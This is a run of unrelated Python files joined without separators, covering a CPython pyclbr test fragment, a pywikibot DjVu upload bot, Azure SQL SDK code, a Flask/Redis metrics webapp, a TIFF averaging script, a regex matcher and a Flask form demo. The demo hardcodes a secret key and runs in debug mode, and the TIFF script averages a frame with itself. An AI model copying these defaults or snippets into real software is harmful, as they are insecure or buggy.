                real_bases = [base.__name__ for base in py_item.__bases__]
                pyclbr_bases = [ getattr(base, 'name', base)
                                 for base in value.super ]

                try:
                    self.assertListEq(real_bases, pyclbr_bases, ignore)
                except:
                    print >>sys.stderr, "class=%s" % py_item
                    raise

                actualMethods = []
                for m in py_item.__dict__.keys():
                    if ismethod(py_item, getattr(py_item, m), m):
                        actualMethods.append(m)
                foundMethods = []
                for m in value.methods.keys():
                    # Re-apply private-name mangling to pyclbr's names so
                    # they can be compared with the introspected ones.
                    if m[:2] == '__' and m[-2:] != '__':
                        foundMethods.append('_'+name+m)
                    else:
                        foundMethods.append(m)

                try:
                    self.assertListEq(foundMethods, actualMethods, ignore)
                    self.assertEquals(py_item.__module__, value.module)

                    self.assertEqualsOrIgnored(py_item.__name__, value.name,
                                               ignore)
                    # can't check file or lineno
                except:
                    print >>sys.stderr, "class=%s" % py_item
                    raise

        # Now check for missing stuff.
        # True iff *item* was defined in *module* itself (not just imported).
        def defined_in(item, module):
            if isinstance(item, ClassType):
                return item.__module__ == module.__name__
            if isinstance(item, FunctionType):
                return item.func_globals is module.__dict__
            return False
        for name in dir(module):
            item = getattr(module, name)
            if isinstance(item,  (ClassType, FunctionType)):
                if defined_in(item, module):
                    self.assertHaskey(dict, name, ignore)

    def test_easy(self):
        self.checkModule('pyclbr')
        self.checkModule('doctest')
        # Silence Py3k warning
        rfc822 = import_module('rfc822', deprecated=True)
        self.checkModule('rfc822', rfc822)
        self.checkModule('difflib')

    def test_decorators(self):
        # XXX: See comment in pyclbr_input.py for a test that would fail
        #      if it were not commented out.
        #
        self.checkModule('test.pyclbr_input')

    def test_others(self):
        cm = self.checkModule

        # These were once about the 10 longest modules
        cm('random', ignore=('Random',))  # from _random import Random as CoreGenerator
        cm('cgi', ignore=('log',))      # set with = in module
        cm('urllib', ignore=('_CFNumberToInt32',
                             '_CStringFromCFString',
                             '_CFSetup',
                             'getproxies_registry',
                             'proxy_bypass_registry',
                             'proxy_bypass_macosx_sysconf',
                             'open_https',
                             'getproxies_macosx_sysconf',
                             'getproxies_internetconfig',)) # not on all platforms
        cm('pickle')
        cm('aifc', ignore=('openfp',))  # set with = in module
        cm('Cookie')
        cm('sre_parse', ignore=('dump',)) # from sre_constants import *
        cm('pdb')
        cm('pydoc')

        # Tests for modules inside packages
        cm('email.parser')
        cm('test.test_pyclbr')


def test_main():
    """Entry point used by the regression-test framework: run the suite."""
    run_unittest(PyclbrTest)


# Allow running this test file directly.
if __name__ == "__main__":
    test_main()

from django.db import models
from django.core.urlresolvers import reverse

class Software(models.Model):
    """A piece of software tracked by name."""

    # Display name of the software package.
    name = models.CharField(max_length=200)

    def __unicode__(self):
        """Human-readable representation (Python 2 Django convention)."""
        return self.name

    def get_absolute_url(self):
        """URL of this object's edit view, resolved by name from the URLconf."""
        return reverse('software_edit', kwargs={'pk': self.pk})


#!/usr/bin/python3
"""
This bot uploads text from djvu files onto pages in the "Page" namespace.

It is intended to be used for Wikisource.

The following parameters are supported:

    -index:...     name of the index page (without the Index: prefix)
    -djvu:...      path to the djvu file; it may be either:
                   - the path to the djvu file itself, or
                   - a directory containing a djvu file named after the index
                   optional; defaults to the current directory '.'
    -pages:<start>-<end>,...<start>-<end>,<start>-<end>
                   Page range to upload;
                   optional, start=1, end=djvu file number of images.
                   Page ranges can be specified as:
                     A-B -> pages A until B
                     A-  -> pages A until number of images
                     A   -> just page A
                     -B  -> pages 1 until B

This script is a :py:obj:`ConfigParserBot <pywikibot.bot.ConfigParserBot>`.
The following options can be set in a settings file, which is scripts.ini
by default:

    -summary:      custom edit summary.
                   Use quotes if edit summary contains spaces.
    -force         overwrites existing text
                   optional, default False
    -always        do not bother asking to confirm any of the changes.

"""
#
# (C) Pywikibot team, 2008-2022
#
# Distributed under the terms of the MIT license.
#
import os.path
from typing import Optional

import pywikibot
from pywikibot import i18n
from pywikibot.bot import SingleSiteBot
from pywikibot.exceptions import NoPageError
from pywikibot.proofreadpage import ProofreadPage
from pywikibot.tools.djvu import DjVuFile


class DjVuTextBot(SingleSiteBot):

    """
    A bot that uploads text-layer from djvu files to Page:namespace.

    Works only on sites with Proofread Page extension installed.

    .. versionchanged:: 7.0
       CheckerBot is a ConfigParserBot
    """

    # Defaults merged into the bot's options (overridable from the command
    # line or the ConfigParserBot settings file).
    update_options = {
        'force': False,
        'summary': '',
    }

    def __init__(
        self,
        djvu,
        index,
        pages: Optional[tuple] = None,
        **kwargs
    ) -> None:
        """
        Initializer.

        :param djvu: djvu from where to fetch the text layer
        :type djvu: DjVuFile object
        :param index: index page in the Index: namespace
        :type index: Page object
        :param pages: page interval to upload (start, end)
        """
        super().__init__(**kwargs)
        self._djvu = djvu
        self._index = index
        # Index title without its namespace, used as the page-title prefix.
        self._prefix = self._index.title(with_ns=False)
        # NOTE(review): relies on the private _proofread_page_ns attribute of
        # the site object -- confirm against the pywikibot version in use.
        self._page_ns = self.site._proofread_page_ns.custom_name

        if not pages:
            # NOTE(review): page_number_gen() iterates self._pages as a list
            # of (start, end) pairs; this single tuple looks like it should
            # be wrapped in a list -- confirm (main() always passes a list).
            self._pages = (1, self._djvu.number_of_images())
        else:
            self._pages = pages

        # Get edit summary message if it's empty.
        if not self.opt.summary:
            self.opt.summary = i18n.twtranslate(self._index.site,
                                                'djvutext-creating')

    def page_number_gen(self):
        """Generate pages numbers from specified page intervals."""
        last = 0
        for start, end in sorted(self._pages):
            # Clamp to the last yielded number so overlapping intervals do
            # not produce duplicates.
            start = max(last, start)
            last = end + 1
            yield from range(start, last)

    @property
    def generator(self):
        """Generate pages from specified page interval."""
        for page_number in self.page_number_gen():
            # Title shape: "<Page namespace>:<index title>/<page number>".
            title = '{page_ns}:{prefix}/{number}'.format(
                page_ns=self._page_ns,
                prefix=self._prefix,
                number=page_number)
            page = ProofreadPage(self._index.site, title)
            page.page_number = page_number  # remember page number in djvu file
            yield page

    def treat(self, page) -> None:
        """Process one page."""
        old_text = page.text

        # Overwrite body of the page with content from djvu
        page.body = self._djvu.get_page(page.page_number)
        new_text = page.text

        if page.exists() and not self.opt.force:
            pywikibot.output(
                'Page {} already exists, not adding!\n'
                'Use -force option to overwrite the output page.'
                .format(page))
        else:
            # userPut honours the -always option and shows a diff otherwise.
            self.userPut(page, old_text, new_text, summary=self.opt.summary)


def main(*args: str) -> None:
    """
    Process command line arguments and invoke bot.

    If args is an empty list, sys.argv is used.

    :param args: command line arguments
    """
    index = None
    djvu_path = '.'  # default djvu file directory
    pages = '1-'
    options = {}

    # Parse command line arguments.
    for argument in pywikibot.handle_args(args):
        opt, _sep, value = argument.partition(':')
        if opt == '-index':
            index = value
        elif opt == '-djvu':
            djvu_path = value
        elif opt == '-pages':
            pages = value
        elif opt == '-summary':
            options['summary'] = value
        elif opt in ('-force', '-always'):
            options[opt.lstrip('-')] = True
        else:
            pywikibot.output('Unknown argument ' + argument)

    # index is mandatory.
    if not index:
        pywikibot.bot.suggest_help(missing_parameters=['-index'])
        return

    # Resolve djvu_path; if it points to a directory, append the index name.
    djvu_path = os.path.abspath(os.path.expanduser(djvu_path))
    if not os.path.exists(djvu_path):
        pywikibot.error('No such file or directory: ' + djvu_path)
        return
    if os.path.isdir(djvu_path):
        djvu_path = os.path.join(djvu_path, index)

    # Check the djvu file exists and, if so, create the DjVuFile wrapper.
    djvu = DjVuFile(djvu_path)

    if not djvu.has_text():
        pywikibot.error('No text layer in djvu file {}'.format(djvu.file))
        return

    # Parse the pages parameter into (start, end) tuples; an open-ended
    # interval like '5-' runs to the last image in the djvu file.
    intervals = []
    for interval in pages.split(','):
        first, sep, last = interval.partition('-')
        begin = int(first or 1)
        stop = int(last or djvu.number_of_images()) if sep else begin
        intervals.append((begin, stop))
    pages = intervals

    site = pywikibot.Site()
    if not site.has_extension('ProofreadPage'):
        pywikibot.error('Site {} must have ProofreadPage extension.'
                        .format(site))
        return

    index_page = pywikibot.Page(site, index, ns=site.proofread_index_ns)

    if not index_page.exists():
        raise NoPageError(index)

    pywikibot.output('uploading text from {} to {}'
                     .format(djvu.file, index_page.title(as_link=True)))

    bot = DjVuTextBot(djvu, index_page, pages=pages, site=site, **options)
    bot.run()


if __name__ == '__main__':
    try:
        main()
    except Exception:
        # Report any unhandled error through pywikibot's logging with the
        # full traceback instead of letting it reach the interpreter.
        pywikibot.error('Fatal error:', exc_info=True)

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings

from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer

from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
# Signature of the optional 'cls' callback: receives the pipeline response,
# the deserialized body and the response headers, and returns any value.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

# Module-level serializer used by the build_* request helpers; client-side
# validation is disabled because the service validates the values itself.
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False

def build_get_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    query_id: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request for the 'get query by id' operation."""
    api_version = "2020-11-01-preview"
    accept = "application/json"

    # URL: serialize each path argument and substitute it into the template.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "queryId": _SERIALIZER.url("query_id", query_id, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }
    url = _format_url_section(url, **path_args)

    # Query string: only the mandatory api-version parameter.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )


def build_list_by_query_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    query_id: str,
    subscription_id: str,
    *,
    start_time: Optional[str] = None,
    end_time: Optional[str] = None,
    interval: Optional[Union[str, "_models.QueryTimeGrainType"]] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request for the 'list query statistics' operation."""
    api_version = "2020-11-01-preview"
    accept = "application/json"

    # URL: serialize each path argument and substitute it into the template.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}/statistics')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "queryId": _SERIALIZER.url("query_id", query_id, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }
    url = _format_url_section(url, **path_args)

    # Query string: optional filters first, then the mandatory api-version.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    if start_time is not None:
        params['startTime'] = _SERIALIZER.query("start_time", start_time, 'str')
    if end_time is not None:
        params['endTime'] = _SERIALIZER.query("end_time", end_time, 'str')
    if interval is not None:
        params['interval'] = _SERIALIZER.query("interval", interval, 'str')
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )

class ManagedDatabaseQueriesOperations(object):
    """ManagedDatabaseQueriesOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.sql.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        # Dependencies are injected by the generated service client.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def get(
        self,
        resource_group_name: str,
        managed_instance_name: str,
        database_name: str,
        query_id: str,
        **kwargs: Any
    ) -> "_models.ManagedInstanceQuery":
        """Get query by query id.

        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param managed_instance_name: The name of the managed instance.
        :type managed_instance_name: str
        :param database_name: The name of the database.
        :type database_name: str
        :param query_id:
        :type query_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ManagedInstanceQuery, or the result of cls(response)
        :rtype: ~azure.mgmt.sql.models.ManagedInstanceQuery
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedInstanceQuery"]
        # Map well-known status codes to typed azure-core exceptions; callers
        # may extend or override the mapping via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_get_request(
            resource_group_name=resource_group_name,
            managed_instance_name=managed_instance_name,
            database_name=database_name,
            query_id=query_id,
            subscription_id=self._config.subscription_id,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ManagedInstanceQuery', pipeline_response)

        if cls:
            # Hand the raw response and deserialized body to the caller's hook.
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}'}  # type: ignore


    @distributed_trace
    def list_by_query(
        self,
        resource_group_name: str,
        managed_instance_name: str,
        database_name: str,
        query_id: str,
        start_time: Optional[str] = None,
        end_time: Optional[str] = None,
        interval: Optional[Union[str, "_models.QueryTimeGrainType"]] = None,
        **kwargs: Any
    ) -> Iterable["_models.ManagedInstanceQueryStatistics"]:
        """Get query execution statistics by query id.

        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param managed_instance_name: The name of the managed instance.
        :type managed_instance_name: str
        :param database_name: The name of the database.
        :type database_name: str
        :param query_id:
        :type query_id: str
        :param start_time: Start time for observed period.
        :type start_time: str
        :param end_time: End time for observed period.
        :type end_time: str
        :param interval: The time step to be used to summarize the metric values.
        :type interval: str or ~azure.mgmt.sql.models.QueryTimeGrainType
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ManagedInstanceQueryStatistics or the result of
         cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.sql.models.ManagedInstanceQueryStatistics]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedInstanceQueryStatistics"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page uses the operation's URL template; later pages
            # follow the nextLink URL returned by the service.
            if not next_link:

                request = build_list_by_query_request(
                    resource_group_name=resource_group_name,
                    managed_instance_name=managed_instance_name,
                    database_name=database_name,
                    query_id=query_id,
                    subscription_id=self._config.subscription_id,
                    start_time=start_time,
                    end_time=end_time,
                    interval=interval,
                    template_url=self.list_by_query.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:

                request = build_list_by_query_request(
                    resource_group_name=resource_group_name,
                    managed_instance_name=managed_instance_name,
                    database_name=database_name,
                    query_id=query_id,
                    subscription_id=self._config.subscription_id,
                    start_time=start_time,
                    end_time=end_time,
                    interval=interval,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            # Deserialize one page and return (next_link, iterator of items).
            deserialized = self._deserialize("ManagedInstanceQueryStatistics", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            # Fetch a single page, mapping error status codes as in get().
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list_by_query.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/queries/{queryId}/statistics'}  # type: ignore

import redis
import logging
import simplejson as json
import sys
from msgpack import Unpacker
from flask import Flask, request, render_template
from daemon import runner
from os.path import dirname, abspath

# add the shared settings file to namespace
sys.path.insert(0, dirname(dirname(abspath(__file__))))
import settings

# Shared redis connection over a unix socket (path comes from settings).
REDIS_CONN = redis.StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)

app = Flask(__name__)
# Surface exceptions to the WSGI layer even when debug mode is off.
app.config['PROPAGATE_EXCEPTIONS'] = True


@app.route("/")
def index():
    """Render the dashboard landing page."""
    rendered = render_template('index.html')
    return rendered, 200


@app.route("/app_settings")
def app_settings():
    """Expose the client-relevant server settings as JSON."""
    exposed = {
        'GRAPHITE_HOST': settings.GRAPHITE_HOST,
        'OCULUS_HOST': settings.OCULUS_HOST,
        'FULL_NAMESPACE': settings.FULL_NAMESPACE,
    }
    return json.dumps(exposed), 200


@app.route("/api", methods=['GET'])
def data():
    """Return the stored timeseries for ``?metric=<name>`` as JSON.

    Responds 404 when the metric is unknown, 500 on any other failure.
    """
    metric = request.args.get('metric', None)
    try:
        raw_series = REDIS_CONN.get(metric)
        if not raw_series:
            resp = json.dumps({'results': 'Error: No metric by that name'})
            return resp, 404
        else:
            unpacker = Unpacker(use_list=False)
            unpacker.feed(raw_series)
            # keep only the first two fields (timestamp, value) of each item
            timeseries = [item[:2] for item in unpacker]
            resp = json.dumps({'results': timeseries})
            return resp, 200
    except Exception as e:
        # Fix: '"Error: " + e' concatenated str with an Exception object,
        # which raises TypeError on Python 3 and masked the original error.
        error = "Error: " + str(e)
        resp = json.dumps({'results': error})
        return resp, 500


class App():
    """Application wrapper consumed by python-daemon's DaemonRunner."""

    def __init__(self):
        # Stream/pidfile paths required by the daemon runner protocol.
        self.stdin_path = '/dev/null'
        self.stdout_path = '{}/webapp.log'.format(settings.LOG_PATH)
        self.stderr_path = '{}/webapp.log'.format(settings.LOG_PATH)
        self.pidfile_path = '{}/webapp.pid'.format(settings.PID_PATH)
        self.pidfile_timeout = 5

    def run(self):
        """Start the Flask development server on the configured address."""
        # NOTE(review): 'logger' is a module-level name created only in the
        # __main__ block — calling run() without it raises NameError; confirm.
        logger.info('starting webapp')
        logger.info('hosted at %s', settings.WEBAPP_IP)
        logger.info('running on port %d', settings.WEBAPP_PORT)

        app.run(settings.WEBAPP_IP, settings.WEBAPP_PORT)

if __name__ == "__main__":
    """
    Start the server
    """

    webapp = App()

    # Module-level logger; App.run() relies on this name existing.
    logger = logging.getLogger("AppLog")
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter("%(asctime)s :: %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
    handler = logging.FileHandler(settings.LOG_PATH + '/webapp.log')
    handler.setFormatter(formatter)
    logger.addHandler(handler)

    if len(sys.argv) > 1 and sys.argv[1] == 'run':
        # Foreground mode: run the Flask app directly in this process.
        webapp.run()
    else:
        # Daemon mode: fork into the background, keeping the log file
        # descriptor open across the fork so logging keeps working.
        daemon_runner = runner.DaemonRunner(webapp)
        daemon_runner.daemon_context.files_preserve = [handler.stream]
        daemon_runner.do_action()

from PIL import Image
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np

# Open a multi-frame (multipage) TIFF; individual frames are selected
# with Image.seek() below.
img1 = Image.open('multipage.tif')

# The following approach seems to be having issue with the
# current TIFF format data

print('The size of each frame is:')
print(img1.size)

# Plots first frame
print('Frame 1')
fig1 = plt.figure(1)
img1.seek(0)
# for i in range(250):
    # pixA11 = img1.getpixel((1,i))
    # print(pixA11)
f1 = list(img1.getdata())
print(f1[1000])
plt.imshow(img1)
fig1.show()
input()


# Plots eleventh frame
# print('Frame 11')
# fig2 = plt.figure(2)
# img1.seek(10)
# # for i in range(250):
    # # pixB11 = img1.getpixel((1,i))
    # # print(pixB11)
# f2 = list(img1.getdata())
# print(f2[10000])
# plt.imshow(img1)
# fig2.show()
# input()

# Create a new image
fig3 = plt.figure(3)
imgAvg = Image.new(img1.mode, img1.size)
print(img1.mode)
print(img1.size)
fAvg = list()
pix = imgAvg.load()
# NOTE(review): the loop below averages f1 with itself, so avg.tiff is
# just frame 1 again — presumably one operand should be f2 (frame 11,
# commented out above); confirm intent.
# NOTE(review): the 512x512 bounds are hard-coded — assumes each frame
# is 512x512; TODO confirm against img1.size.
for i in range(512):
    for j in range(512):
        pixVal = (f1[i*512+j] + f1[i*512+j]) / 2
        # fAvg.append(pixVal)
        fAvg.insert(i*512+j,pixVal)
imgAvg.putdata(fAvg)
imgAvg.save('avg.tiff')
plt.imshow(imgAvg)
fig3.show()
print('Average')


# The following is necessary to keep the above figures 'alive'
input()



# data = random.random((256, 256))
# img1 = Image.fromarray(data)
# img1.save('test.tiff')

class R:
    """One compiled regex token: a literal char or '.', optionally starred."""

    def __init__(self, c):
        self.c = c             # the token's character ('.' matches anything)
        self.is_star = False   # set True when the token is followed by '*'

    def match(self, c):
        """Return True if this token can consume the character *c*."""
        return self.c in ('.', c)


class Solution(object):
    def isMatch(self, s, p):
        """
        Full-string regex match supporting '.' and '*' (LeetCode 10).

        :type s: str
        :type p: str
        :rtype: bool
        """
        # Compile the pattern into tokens; '*' stars the preceding token.
        tokens = []
        for ch in p:
            if ch == '*':
                tokens[-1].is_star = True
            else:
                tokens.append(R(ch))

        n_tok = len(tokens)
        n_str = len(s)
        s += '\0'  # sentinel so s[j - 1] is defined for every j

        # table[i][j]: do the first i tokens match the first j characters?
        table = [[False] * (n_str + 1) for _ in range(n_tok + 1)]
        table[0][0] = True

        for i, token in enumerate(tokens):
            for j in range(n_str + 1):
                ch = s[j - 1]
                if token.is_star:
                    # zero occurrences of the starred token ...
                    table[i + 1][j] = table[i][j]
                    # ... or one more character consumed by it
                    if j and token.match(ch):
                        table[i + 1][j] |= table[i + 1][j - 1]
                elif j and token.match(ch):
                    table[i + 1][j] = table[i][j - 1]
        return table[-1][-1]

from flask import Flask, render_template, flash
from flask_material_lite import Material_Lite
from flask_appconfig import AppConfig
from flask_wtf import Form, RecaptchaField
from flask_wtf.file import FileField
from wtforms import TextField, HiddenField, ValidationError, RadioField,\
    BooleanField, SubmitField, IntegerField, FormField, validators
from wtforms.validators import Required


# straight from the wtforms docs:
class TelephoneForm(Form):
    """Sub-form collecting the parts of a phone number (used via FormField)."""

    # NOTE(review): validators.required() is deprecated (removed in newer
    # WTForms); DataRequired is the modern equivalent — confirm the pinned
    # WTForms version before changing.
    country_code = IntegerField('Country Code', [validators.required()])
    area_code = IntegerField('Area Code/Exchange', [validators.required()])
    number = TextField('Number')


class ExampleForm(Form):
    """Demo form exercising every major field type supported by the theme."""

    field1 = TextField('First Field', description='This is field one.')
    field2 = TextField('Second Field', description='This is field two.',
                       validators=[Required()])
    hidden_field = HiddenField('You cannot see this', description='Nope')
    recaptcha = RecaptchaField('A sample recaptcha field')
    radio_field = RadioField('This is a radio field', choices=[
        ('head_radio', 'Head radio'),
        ('radio_76fm', "Radio '76 FM"),
        ('lips_106', 'Lips 106'),
        ('wctr', 'WCTR'),
    ])
    checkbox_field = BooleanField('This is a checkbox',
                                  description='Checkboxes can be tricky.')

    # subforms
    mobile_phone = FormField(TelephoneForm)

    # you can change the label as well
    office_phone = FormField(TelephoneForm, label='Your office phone')

    ff = FileField('Sample upload')

    submit_button = SubmitField('Submit Form')


    # Inline WTForms validator (validate_<fieldname> convention): always
    # raises, so the demo page always shows an error on the hidden field.
    def validate_hidden_field(form, field):
        raise ValidationError('Always wrong')


def create_app(configfile=None):
    """Create and configure the Flask-Material-Lite demo application."""
    app = Flask(__name__)
    # Flask-Appconfig is not necessary, but highly recommended =)
    # https://github.com/mbr/flask-appconfig
    AppConfig(app, configfile)
    Material_Lite(app)

    # in a real app, these should be configured through Flask-Appconfig
    app.config['SECRET_KEY'] = 'devkey'
    app.config['RECAPTCHA_PUBLIC_KEY'] = (
        '6Lfol9cSAAAAADAkodaYl9wvQCwBMr3qGR_PPHcw')

    @app.route('/', methods=('GET', 'POST'))
    def index():
        form = ExampleForm()
        form.validate_on_submit()  # to get error messages to the browser
        # One flash per category so the template can style each variant.
        for category in ('critical', 'error', 'warning',
                         'info', 'debug', 'different'):
            flash('{} message'.format(category), category)
        flash('uncategorized message')
        return render_template('index.html', form=form)

    return app

if __name__ == '__main__':
    # Run the demo app with the debugger/auto-reloader enabled.
    create_app().run(debug=True)

#!/usr/bin/env python3

from __future__ import print_function, division

import numpy as np
from sht.grids import standard_grid, get_cartesian_grid

def test_grids():
    """Sanity-check grid sizes and shapes for a small band limit."""
    L = 10
    thetas, phis = standard_grid(L)

    # Can't really test much here
    assert thetas.size == L
    assert phis.size == L ** 2

    cart = get_cartesian_grid(thetas, phis)
    assert cart.shape == (L ** 2, 3)


"""
Visualize possible stitches with the outcome of the validator.
"""

import math
import random
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np

from mpl_toolkits.mplot3d import Axes3D

import stitcher

# Vertical offset between the container (z=0) and request (z=SPACE) layers,
# and the upper bound of the random jitter applied to overlapping nodes.
SPACE = 25
# matplotlib marker shape per node type attribute.
TYPE_FORMAT = {'a': '^', 'b': 's', 'c': 'v'}


def show(graphs, request, titles, prog='neato', size=None,
         type_format=None, filename=None):
    """
    Display the candidate graphs in a grid of subplots using matplotlib.
    """
    if not size:
        size = _get_size(len(graphs))
    if not type_format:
        type_format = TYPE_FORMAT

    fig, axarr = plt.subplots(size[0], size[1], figsize=(18, 10))
    fig.set_facecolor('white')

    # With a single row, plt.subplots returns a 1-d array; normalise to 2-d.
    if size[0] == 1:
        axarr = np.array(axarr).reshape((1, size[1]))

    for index, candidate in enumerate(graphs):
        row, col = divmod(index, size[1])
        axes = axarr[row, col]
        # Hide tick marks and labels without turning the axis off entirely.
        axes.xaxis.set_major_formatter(plt.NullFormatter())
        axes.yaxis.set_major_formatter(plt.NullFormatter())
        axes.xaxis.set_ticks([])
        axes.yaxis.set_ticks([])
        axes.set_title(titles[index])
        _plot_subplot(candidate, request.nodes(), prog, type_format, axes)

    fig.tight_layout()
    if filename is not None:
        plt.savefig(filename)
    else:
        plt.show()
    plt.close()


def _plot_subplot(graph, new_nodes, prog, type_format, axes):
    """
    Plot a single candidate graph on the given axes.
    """
    pos = nx.nx_agraph.graphviz_layout(graph, prog=prog)

    # Nodes: shape encodes the node type, colour encodes newness/rank.
    for node, attrs in graph.nodes(data=True):
        shape = type_format.get(attrs[stitcher.TYPE_ATTR], 'o')
        if node in new_nodes:
            color, alpha = 'b', 0.2
        elif 'rank' in attrs and attrs['rank'] > 7:
            color, alpha = 'r', 0.8
        elif 'rank' in attrs and 3 < attrs['rank'] < 7:
            color, alpha = 'y', 0.8
        else:
            color, alpha = 'g', 0.8
        nx.draw_networkx_nodes(graph, pos, nodelist=[node], node_color=color,
                               node_shape=shape, alpha=alpha, ax=axes)

    # Edges: stitches from a new node into the container are dotted.
    dotted = []
    solid = []
    for src, trg in graph.edges():
        if src in new_nodes and trg not in new_nodes:
            dotted.append((src, trg))
        else:
            solid.append((src, trg))
    nx.draw_networkx_edges(graph, pos, edgelist=dotted, style='dotted',
                           ax=axes)
    nx.draw_networkx_edges(graph, pos, edgelist=solid, ax=axes)

    # Node labels.
    nx.draw_networkx_labels(graph, pos, ax=axes)


def show_3d(graphs, request, titles, prog='neato', filename=None):
    """
    Show the candidates in 3d - the request elevated above the container.
    """
    fig = plt.figure(figsize=(18, 10))
    fig.set_facecolor('white')

    rows, cols = _get_size(len(graphs))

    for i, graph in enumerate(graphs):
        axes = fig.add_subplot(rows, cols, i + 1,
                               projection=Axes3D.name)
        axes.set_title(titles[i])
